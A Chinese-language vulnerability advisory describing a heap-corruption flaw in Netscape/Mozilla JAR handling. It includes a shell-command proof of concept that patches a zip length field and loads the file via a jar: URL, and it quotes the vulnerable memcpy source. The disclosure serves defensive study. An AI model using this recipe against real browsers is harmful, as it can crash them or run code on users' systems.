涉及程序: Netscape/Mozilla JAR 描述: Netscape/Mozilla JAR 非法文件长度信息远程堆破坏缺陷 详细: Netscape/Mozilla 都是比较流行的Web浏览器。 Netscape/Mozilla 使用的JAR URI处理器对包含在JAR文件中非法文件长度信息缺乏正确的检查,远程攻击者可利用此缺陷使浏览器产生基于堆的破坏,甚至可能以用户进程权限在受害者系统上执行任意指令。 攻击者可以构建含有非法文件长度信息的恶意JAR文件,当客户端浏览器尝试解压缩恶意JAR文件时,非法的值就被用于分配过多的缓冲区空间,而浏览器本身没有对此操作进行充分的缓冲区边界检查,如果过多的数据被解压缩可导致发生基于堆的破坏,精心构建并提交的数据可能以用户进程权限在系统上执行任意指令。 攻击方法: 建立一个名为test.gif文件,并输入如下6个\`int\`整数: 0x2d6e657a,0x65726568, 0x00000000,0x00000000, 0xdeadbeef,0xfee1600d $ zip orig.jar test.gif adding: test.gif (deflated 17%) $ unzip -v orig.jar Archive: orig.jar Length Method Size Ratio Date Time CRC-32 Name -------- ------ ------- ----- ---- ---- ------ ---- 24 Defl:N 20 17% 07-08-02 16:11 b74deafe test.gif -------- ------- --- ------- 24 20 17% 1 file $ sed s/`printf \`\\x18\``/`printf \`\\x01\``/g orig.jar >new.jar $ unzip -v new.jar Archive: new.jar Length Method Size Ratio Date Time CRC-32 Name -------- ------ ------- ----- ---- ---- ------ ---- 1 Defl:N 20 -1900% 07-08-02 16:11 b74deafe test.gif -------- ------- --- ------- 1 20 -1900% 1 file $ cp new.jar ~/public_html 在 Netscape中打开: jar:http://host/~username/new.jar!/test.gif The jar file is retrieved, the requested file is found... ... 584 //-- Read the item into memory 585 // Inflate if necessary and save in mInflatedFileBuffer 586 // for sequential reading. 587 // (nsJAR needs the whole file in memory before passing it on) 588 char* buf = (char*)PR_Malloc(item->realsize); 589 if (!buf) return ZIP_ERR_MEMORY; 590 switch(item->compression) 591 { 592 case DEFLATED: 593 result = InflateItem(item, 0, buf); 594 break; ... 一款缓冲区被分配来存储数据,Realsize值等于length值,(由于填补,Size 1实际分配8字节),buf值传递给inflater: ... 1268 PRInt32 nsZipArchive::InflateItem( const nsZipItem* aItem, PRFileDesc* fOut, 1269 char* bigBuf ) ... 而bigBuf将用于memcpy,可触发基于堆的破坏: ... 1382 { 1383 //-- copy inflated buffer to our big buffer 1384 // Assertion makes sure we don`t overflow bigBuf 1385 PR_ASSERT( outpos + ZIP_BUFLEN <= bigBufSize); 1386 char* copyStart = bigBuf + outpos; 1387 memcpy(copyStart, outbuf, ZIP_BUFLEN); 1388 } ... 解决方案: Netscape -------- 目前厂商还没有提供补丁或者升级程序,建议用户随时关注厂商站点: http://www.netscape.com Mozilla ------- 目前厂商还没有提供补丁或者升级程序,建议用户随时关注厂商站点: http://www.mozilla.org